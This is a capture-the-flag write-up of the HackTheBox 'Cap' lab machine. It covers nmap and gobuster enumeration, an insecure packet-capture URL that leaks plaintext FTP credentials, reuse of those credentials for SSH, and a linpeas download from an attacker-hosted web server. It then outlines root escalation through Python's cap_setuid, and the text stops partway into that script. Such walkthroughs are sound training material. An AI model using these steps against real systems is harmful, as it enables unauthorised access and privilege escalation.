RiotSecurityTeam
RiotSecurityTeam Blogs

RiotSecurityTeam Blogs

Cap HackTheBox Writeup

Cap HackTheBox Writeup (Easy)

As shown below are the statistics

image.png

Enumeration (NMAP)

Firstly I ran an NMAP scan to identify open ports, service detection and information.

nmap -sC -sV 10.10.10.245
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-17 23:31 EDT
Nmap scan report for 10.10.10.245
Host is up (0.13s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Fri, 18 Jun 2021 03:43:59 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 18 Jun 2021 03:43:53 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 18 Jun 2021 03:43:53 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: HEAD, GET, OPTIONS
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.91%I=7%D=6/17%Time=60CC13AF%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,15A0,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20
SF:Fri,\x2018\x20Jun\x202021\x2003:43:53\x20GMT\r\nConnection:\x20close\r\
SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20193
SF:86\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\">\
SF:n\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x2
SF:0<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\
SF:x20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<meta\
SF:x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=
SF:1\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"image
SF:/png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x20<
SF:link\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css\">
SF:\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/fon
SF:t-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20
SF:href=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20rel=
SF:\"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20\x2
SF:0<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.min\.
SF:css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/c
SF:ss/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOption
SF:s,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Fri,\x2
SF:018\x20Jun\x202021\x2003:43:53\x20GMT\r\nConnection:\x20close\r\nConten
SF:t-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20HEAD,\x20GET,\x20OP
SF:TIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1\x2
SF:0400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20text
SF:/html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\x20
SF:\x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<body>\
SF:n\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Invali
SF:d\x20HTTP\x20Version\x20&#x27;Invalid\x20HTTP\x20Version:\x20&#x27;RTSP
SF:/1\.0&#x27;&#x27;\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,189
SF:,"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x20F
SF:ri,\x2018\x20Jun\x202021\x2003:43:59\x20GMT\r\nConnection:\x20close\r\n
SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20232\
SF:r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\x20
SF:Final//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>
SF:\n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20ser
SF:ver\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20ch
SF:eck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.03 seconds

Analysing the results above we see three ports open and three services running, they go in the following list.

  • 21 = vsftpd 3.0.3
  • 22 = OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
  • 80/tcp open http gunicorn

If you're unaware of what "gunicorn" is here is a brief explanation, Gunicorn "Green Unicorn" is a Python Web Server Gateway Interface HTTP server.

Web App Enumeration

Heading over to the Web Application we see a nice template being provided by "Colorlib"

image.png

Lets try discovering some files and directories running Gobuster, this can help us enumerate any kind of pages/functionality on the Web App and or information that isn't suppose to be disclosed thus can lead to vulnerabilities E.G a webpage that allows us to upload files but is under construction.

gobuster dir -u http://10.10.10.245 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt                                                        
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.245
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/06/17 23:56:46 Starting gobuster in directory enumeration mode
===============================================================
/data                 (Status: 302) [Size: 208] [--> http://10.10.10.245/]
/ip                   (Status: 200) [Size: 17466]                         
/netstat              (Status: 200) [Size: 32292]                         
/capture              (Status: 302) [Size: 222] [--> http://10.10.10.245/data/16]

Analysing the responses we have two "302" status codes which are "Found redirection" and than we have two "200" which is "OK Success" lets check these out heading over to the following URL: 10.10.10.245/ip

image.png

This page seems to be displaying "ipconfig" for Windows based users and "ifconfig" for Linux based users, this displays the boxes eth0 interface configuration E.G the "inet" so some how this is posting information about the box, whether this be live I am unsure. Lets check the source code to check for any kind of possible Information Disclosure/comments on this.

I see the following on how it is displaying the "eth0" interface configuration, the source code displays the following.

<pre>eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500
        inet 10.10.10.245  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:9a6f  prefixlen 64  scopeid 0x20&lt;link&gt;
        inet6 dead:beef::250:56ff:feb9:9a6f  prefixlen 64  scopeid 0x0&lt;global&gt;
        ether 00:50:56:b9:9a:6f  txqueuelen 1000  (Ethernet)
        RX packets 2907275  bytes 373001526 (373.0 MB)
        RX errors 0  dropped 290  overruns 0  frame 0
        TX packets 3095798  bytes 675868558 (675.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10&lt;host&gt;
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 34789  bytes 2672084 (2.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 34789  bytes 2672084 (2.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0</pre>

Due to the look of this I do not believe there is an API being loaded as its inside of pre tags but this doesn't mean there isn't an API Endpoint somewhere, we can try checking the Network tab but firstly what are pre tags used for?? Pre tags are used to define a block of preformatted text that preserves line breaks, spaces etc.

Checking the Network tab is pretty simple we can just press "F12" and navigate to "Netwrok" press "F5" which will refresh the page and analyse everything being loaded onto that Web Server/page.

image.png

I do not see anything being loaded API wise, lets move on to the next thing which is "/netstat" this sounds interesting and I am wondering if this is live or if its just been copy and pasted, we will follow the same mindset of analysing the page and the contents being loaded than we will view the source code again.

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode      PID/Program name     Timer
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      101        32358      -                    off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      0          33655      -                    off (0.00/0/0)
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1001       35841      -                    off (0.00/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35224       TIME_WAIT   0          0          -                    timewait (37.23/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:35811       ESTABLISHED 1001       437271     -                    on (0.62/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:33113       ESTABLISHED 1001       436671     -                    on (0.56/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:57691       TIME_WAIT   0          0          -                    timewait (18.69/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.16:57266       ESTABLISHED 1001       436729     -                    off (0.00/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35264       TIME_WAIT   0          0          -                    timewait (55.26/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35192       TIME_WAIT   0          0          -                    timewait (32.73/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35172       TIME_WAIT   0          0          -                    timewait (4.11/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35186       TIME_WAIT   0          0          -                    timewait (33.14/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35216       TIME_WAIT   0          0          -                    timewait (34.35/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35244       TIME_WAIT   0          0          -                    timewait (40.74/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35212       TIME_WAIT   0          0          -                    timewait (36.98/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:46493       ESTABLISHED 1001       437275     -                    on (0.54/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:40887       TIME_WAIT   0          0          -                    timewait (44.16/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35198       TIME_WAIT   0          0          -                    timewait (31.82/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:35577       ESTABLISHED 1001       437274     -                    on (0.62/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35196       TIME_WAIT   0          0          -                    timewait (32.60/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:47709       ESTABLISHED 1001       437273     -                    on (0.40/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:51535       ESTABLISHED 1001       436688     -                    on (0.49/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:53699       TIME_WAIT   0          0          -                    timewait (43.73/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:32991       TIME_WAIT   0          0          -                    timewait (18.79/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35246       TIME_WAIT   0          0          -                    timewait (43.95/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:38617       TIME_WAIT   0          0          -                    timewait (40.03/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35242       TIME_WAIT   0          0          -                    timewait (42.42/0/0)
tcp        0      0 10.10.10.245:22         10.10.14.124:35156      ESTABLISHED 0          37911      -                    keepalive (1276.17/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35170       TIME_WAIT   0          0          -                    timewait (0.00/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35222       TIME_WAIT   0          0          -                    timewait (39.52/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:44185       ESTABLISHED 1001       436670     -                    on (0.48/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35204       TIME_WAIT   0          0          -                    timewait (33.14/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35194       TIME_WAIT   0          0          -                    timewait (32.73/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35188       TIME_WAIT   0          0          -                    timewait (32.79/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:41435       ESTABLISHED 1001       437272     -                    on (0.49/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35190       TIME_WAIT   0          0          -                    timewait (32.73/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35206       TIME_WAIT   0          0          -                    timewait (31.89/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35210       TIME_WAIT   0          0          -                    timewait (42.56/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35228       TIME_WAIT   0          0          -                    timewait (46.46/0/0)
tcp        0      0 10.10.10.245:80         10.10.14.19:35256       TIME_WAIT   0          0          -                    timewait (48.67/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:50513       ESTABLISHED 1001       437294     -                    on (0.51/0/0)
tcp        0    166 10.10.10.245:80         10.10.14.19:46967       ESTABLISHED 1001       437296     -                    on (0.54/0/0)
tcp6       0      0 :::21                   :::*                    LISTEN      0          33290      -                    off (0.00/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      0          33657      -                    off (0.00/0/0)
udp        0      0 127.0.0.53:53           0.0.0.0:*                           101        31957      -                    off (0.00/0/0)
udp        0      0 10.10.10.245:60625      1.1.1.1:53              ESTABLISHED 101        433148     -                    off (0.00/0/0)
udp        0      0 127.0.0.1:37307         127.0.0.53:53           ESTABLISHED 102        437297     -                    off (0.00/0/0)
udp        0      0 10.10.10.245:55763      1.1.1.1:53              ESTABLISHED 101        433147     -                    off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name     Path
unix  2      [ ACC ]     SEQPACKET  LISTENING     25965    -                    /run/udev/control
unix  2      [ ]         DGRAM                    38090    1192/systemd         /run/user/1001/systemd/notify
unix  2      [ ACC ]     STREAM     LISTENING     38093    1192/systemd         /run/user/1001/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     38099    1192/systemd         /run/user/1001/bus
unix  2      [ ACC ]     STREAM     LISTENING     38100    1192/systemd         /run/user/1001/gnupg/S.dirmngr
unix  2      [ ACC ]     STREAM     LISTENING     38101    1192/systemd         /run/user/1001/gnupg/S.gpg-agent.browser
unix  2      [ ACC ]     STREAM     LISTENING     38102    1192/systemd         /run/user/1001/gnupg/S.gpg-agent.extra
unix  2      [ ACC ]     STREAM     LISTENING     25949    -                    @/org/kernel/linux/storage/multipathd
unix  2      [ ACC ]     STREAM     LISTENING     38103    1192/systemd         /run/user/1001/gnupg/S.gpg-agent.ssh
unix  3      [ ]         DGRAM                    25933    -                    /run/systemd/notify
unix  2      [ ACC ]     STREAM     LISTENING     38104    1192/systemd         /run/user/1001/gnupg/S.gpg-agent
unix  2      [ ACC ]     STREAM     LISTENING     38105    1192/systemd         /run/user/1001/pk-debconf-socket
unix  2      [ ACC ]     STREAM     LISTENING     38106    1192/systemd         /run/user/1001/snapd-session-agent.socket
unix  2      [ ACC ]     STREAM     LISTENING     25936    -                    /run/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     25938    -                    /run/systemd/userdb/io.systemd.DynamicUser
unix  2      [ ACC ]     STREAM     LISTENING     25947    -                    /run/lvm/lvmpolld.socket
unix  2      [ ]         DGRAM                    25950    -                    /run/systemd/journal/syslog
unix  10     [ ]         DGRAM                    25958    -                    /run/systemd/journal/dev-log
unix  2      [ ACC ]     STREAM     LISTENING     25960    -                    /run/systemd/journal/stdout
unix  9      [ ]         DGRAM                    25962    -                    /run/systemd/journal/socket
unix  2      [ ACC ]     STREAM     LISTENING     34700    -                    /run/irqbalance//irqbalance821.sock
unix  2      [ ACC ]     STREAM     LISTENING     26920    -                    /run/systemd/journal/io.systemd.journal
unix  2      [ ACC ]     STREAM     LISTENING     31209    -                    /run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     31220    -                    /run/snapd.socket
unix  2      [ ACC ]     STREAM     LISTENING     31222    -                    /run/snapd-snap.socket
unix  2      [ ACC ]     STREAM     LISTENING     31224    -                    /run/uuidd/request
unix  2      [ ACC ]     STREAM     LISTENING     31881    -                    /var/run/vmware/guestServicePipe
unix  2      [ ACC ]     STREAM     LISTENING     31214    -                    /var/snap/lxd/common/lxd/unix.socket
unix  2      [ ACC ]     STREAM     LISTENING     31213    -                    @ISCSIADM_ABSTRACT_NAMESPACE
unix  2      [ ]         DGRAM                    33081    -                    
unix  2      [ ]         DGRAM                    26922    -                    
unix  3      [ ]         STREAM     CONNECTED     34873    -                    
unix  3      [ ]         STREAM     CONNECTED     29694    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     31731    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     71252    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     71305    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     34686    65345/sh             
unix  3      [ ]         STREAM     CONNECTED     32581    -                    
unix  3      [ ]         STREAM     CONNECTED     32894    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     32727    -                    
unix  3      [ ]         STREAM     CONNECTED     34878    -                    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     38094    1192/systemd         
unix  3      [ ]         STREAM     CONNECTED     39198    -                    
unix  3      [ ]         STREAM     CONNECTED     57408    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     57429    4486/dbus-daemon     /run/user/1001/bus
unix  3      [ ]         STREAM     CONNECTED     30433    -                    
unix  3      [ ]         STREAM     CONNECTED     29693    -                    /run/systemd/journal/stdout
unix  2      [ ]         DGRAM                    38082    1192/systemd         
unix  2      [ ]         DGRAM                    27681    -                    
unix  3      [ ]         STREAM     CONNECTED     57407    4486/dbus-daemon     
unix  3      [ ]         STREAM     CONNECTED     29551    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     30640    -                    
unix  2      [ ]         DGRAM                    38075    -                    
unix  3      [ ]         STREAM     CONNECTED     30699    -                    
unix  3      [ ]         STREAM     CONNECTED     71251    22397/dirmngr        
unix  3      [ ]         STREAM     CONNECTED     57324    1192/systemd         
unix  3      [ ]         STREAM     CONNECTED     57426    4486/dbus-daemon     
unix  2      [ ]         DGRAM                    34872    -                    
unix  3      [ ]         STREAM     CONNECTED     30434    -                    
unix  3      [ ]         STREAM     CONNECTED     57427    4486/dbus-daemon     
unix  3      [ ]         STREAM     CONNECTED     34259    -                    
unix  3      [ ]         STREAM     CONNECTED     29550    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     71304    -                    
unix  3      [ ]         STREAM     CONNECTED     39199    -                    
unix  3      [ ]         DGRAM                    25934    -                    
unix  3      [ ]         DGRAM                    38092    1192/systemd         
unix  3      [ ]         STREAM     CONNECTED     26564    -                    
unix  2      [ ]         DGRAM                    57419    4486/dbus-daemon     
unix  3      [ ]         DGRAM                    38091    1192/systemd         
unix  3      [ ]         STREAM     CONNECTED     32505    -                    
unix  3      [ ]         STREAM     CONNECTED     31956    -                    
unix  3      [ ]         STREAM     CONNECTED     37159    -                    /run/dbus/system_bus_socket
unix  3      [ ]         DGRAM                    25935    -                    
unix  2      [ ]         DGRAM                    31877    -                    
unix  2      [ ]         DGRAM                    31749    -                    
unix  2      [ ]         DGRAM                    34980    -                    
unix  3      [ ]         STREAM     CONNECTED     34874    -                    
unix  3      [ ]         STREAM     CONNECTED     33326    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     33747    -                    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     33067    -                    
unix  2      [ ]         DGRAM                    27112    -                    
unix  3      [ ]         STREAM     CONNECTED     33773    -                    
unix  3      [ ]         STREAM     CONNECTED     38064    1192/systemd         
unix  2      [ ]         STREAM     CONNECTED     36982    -                    
unix  3      [ ]         STREAM     CONNECTED     33333    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     27176    -                    /run/systemd/journal/stdout
unix  2      [ ]         DGRAM                    35192    -                    
unix  3      [ ]         STREAM     CONNECTED     34879    -                    /run/dbus/system_bus_socket
unix  2      [ ]         DGRAM                    36316    -                    
unix  2      [ ]         DGRAM                    47888    -                    
unix  3      [ ]         STREAM     CONNECTED     31212    -                    
unix  3      [ ]         STREAM     CONNECTED     33332    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     33445    -                    
unix  2      [ ]         DGRAM                    37042    -                    
unix  3      [ ]         STREAM     CONNECTED     31240    -                    
unix  3      [ ]         STREAM     CONNECTED     31309    -                    /run/systemd/journal/stdout
unix  3      [ ]         DGRAM                    71550    -                    
unix  3      [ ]         DGRAM                    26594    -                    
unix  3      [ ]         STREAM     CONNECTED     31382    -                    /run/systemd/journal/stdout
unix  3      [ ]         DGRAM                    31200    -                    
unix  3      [ ]         STREAM     CONNECTED     72068    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     31876    -                    
unix  3      [ ]         STREAM     CONNECTED     32979    -                    /run/systemd/journal/stdout
unix  3      [ ]         DGRAM                    27115    -                    
unix  3      [ ]         STREAM     CONNECTED     33754    -                    /run/dbus/system_bus_socket
unix  3      [ ]         DGRAM                    31201    -                    
unix  3      [ ]         STREAM     CONNECTED     34969    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     37143    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     34875    -                    /run/dbus/system_bus_socket
unix  2      [ ]         DGRAM                    31195    -                    
unix  3      [ ]         STREAM     CONNECTED     32890    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     71648    -                    
unix  3      [ ]         DGRAM                    31199    -                    
unix  3      [ ]         STREAM     CONNECTED     32972    -                    
unix  3      [ ]         STREAM     CONNECTED     34876    -                    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     27177    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     34877    -                    /run/dbus/system_bus_socket
unix  3      [ ]         DGRAM                    31198    -                    
unix  3      [ ]         DGRAM                    26595    -                    
unix  3      [ ]         STREAM     CONNECTED     29868    -                    
unix  3      [ ]         DGRAM                    26596    -                    
unix  3      [ ]         STREAM     CONNECTED     31380    -                    
unix  3      [ ]         STREAM     CONNECTED     35157    -                    
unix  3      [ ]         STREAM     CONNECTED     33777    -                    
unix  3      [ ]         STREAM     CONNECTED     27103    -                    
unix  3      [ ]         DGRAM                    26593    -                    
unix  3      [ ]         DGRAM                    71551    -                    
unix  3      [ ]         STREAM     CONNECTED     35199    -                    
unix  2      [ ]         DGRAM                    26588    -                    
unix  3      [ ]         DGRAM                    27114    -                    
unix  3      [ ]         STREAM     CONNECTED     31308    -                    
unix  3      [ ]         STREAM     CONNECTED     29869    -                    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     33776    -                    
unix  3      [ ]         STREAM     CONNECTED     33774    -                    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     33186    -

Once again its inside of pre tags so I can only assume its been copy and pasted onto the Web Page but this still gives an overview of what is running on the box (connections, ports, sockets etc) this information can help us map the machine.

Exploitation

Heading over to "/capture" we see the following in the URL "/data/10".

image.png

This shows a preview of packets. In my case there is "0" on everything so there is no traffic, I am going to try loading /capture once again to analyse if there is any traffic being loaded. Interesting this time I see "/data/11" what if we change it to "/data/5"

image.png

It displays packets but in an exact form this is weird and looks fake, lets try view "1" or "0" "/data/0"

image.png

This shows a basic number of packets and there data types E.G "Number of Packets" "72" and so on. Lets download this "packet capture" assuming its a .pcap file we can load it into wireshark which is a packet analyser/traffic analyser.

Do the following to successfully load the .pcap file into wireshark and analyse the traffic.

  1. Search for "wireshark" or download and install it.
  2. Click "file" and than select "open".
  3. Navigate other to the directory where the 0.pcap file is and click "open".

If done correctly you'll see a lot of traffic if this is your first time using wireshark do not panic, please watch a video on Wireshark traffic analysis than come back or if you're interested in a breif overview stay here.

image.png

As we can see above there is a basic layout E.G "Time, Source, Destination, Protocol, Length Information" Source is the IP Address the packet was sent from and the Destination is usually the reciever than the protocol is what they're using tto communicate E.G "TCP, HTTP" now we seen there was "VSFTPD" on the machine, the issue with FTP/VSFTPD is that credentials are sent in plain text so if we use the "filter" option of wireshark and look for FTP we may be able to gain a bit of information.

image.png

As you can see there is FTP Traffic meaning there is most likely some credentials analysing the traffic we can see "Nathan" which is a possible username I confirmed this by double clicking on the request and clicking through "FTP".

image.png

We then FTP asking for a password which got sent in plain text.

image.png

"Buck3tH4TF0RM3!" is the FTP Passowrd! 1+1 = Username:nathan Password:Buck3tH4TF0RM3! we can now login with FTP.

image.png

We are now logged in so we can start enumerating the box, the first things I wanna check is if I can move directories? "cd /home" gave me a directory change successfully message meaning we can.

image.png

We also had SSH open on the SSH Default port "22" lets try authenticate with the same credentials.

image.png

Priv Esc

Now we are on the box as "Nathan" we need to get root. I am going to run linpeas which is a popular tool for identifying ways to priv esc and spotting stuff that is a potential risk E.G They will check for binaries, cronjobs, permissions etc etc.

Assuming you've got linpeas on your box we will use the following commands to transfer it to Nathan's box using a popular web server within python3.

python3 -m http.server

wget http://$IP:8000/linpeas.sh

Make sure you have "linpeas.sh" in your working directory E.G /opt/HTB/linpeas.sh and then start your web server in /opt/HTB/linpeas.sh

image.png

Now we need to give linpeas executable permissions, we can run the following commands as the Nathan user to successfully run linpeas.

chmod +x linpeas.sh

Now run "linpeas.sh" using the following command and please do not get overwhelmed if this is your first time viewing linpeas.

./linpeas.sh

image.png

There is a lot of information, if you are unsure about 90% of it please just do some research E.G "Checking for crontabs" if you are unaware of what a crontab is Google.

Also keep an eye on the color output as shown below.

linpeas v3.2.5 by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMagenta: Your username

Going through linpeas we see "Files with capabilities (limited to 50):" and Python3 is under that category.

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

image.png

The binary is owned by root. We also should note the "cap_setuid" there is something in the Python os module that allows us to get the users UID and set a user UID and a lot more, I believe because of the "cap_setuid" we can change our UID.

image.png

image.png

The plan is that if we can change our SUID we can change it to "0" and that being root.

I wrote a script that will try setting the UID you parse E.G "0" if it can set the UID it'll spawn a bash shell with that UID else it'll print an error. So if you come along a CTF that has the capabilities to set your UID using python3 you can now use this or simply do a one liner which I will also show.

import os
uid = os.getuid()
print("Your current SUID is:", uid)
